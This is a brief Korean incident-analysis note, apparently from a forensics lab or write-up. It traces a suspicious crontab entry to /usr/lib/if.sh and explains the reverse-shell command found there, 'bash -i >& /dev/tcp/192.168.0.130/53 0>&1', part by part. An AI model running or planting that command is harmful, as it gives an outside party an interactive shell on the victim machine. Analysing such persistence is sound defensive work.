crontab 에서 의심스러운 경로 확인
user_info 에서 admin 계정 있음 확인
계정 변경해서 해당 파일 확인
su admin
cat /usr/lib/if.sh
Bash
복사
쉘코드 확인
bash -i >& /dev/tcp/192.168.0.130/53 0>&1
Bash
복사
확인결과 위 코드는 리버스쉘을 연결하고 있음을 확인
•
-i : 인터랙티브 모드로 실행
•
>& : 리다이렉트
•
/dev/tcp : 네트워크 연결
•
192.168.0.130/53 : IP/Port
•
0>&1 : 표준 입력(0)을 표준 출력(1) 으로 리다이렉트, 원격 서버로부터 오는 데이터를 받기 위해 사용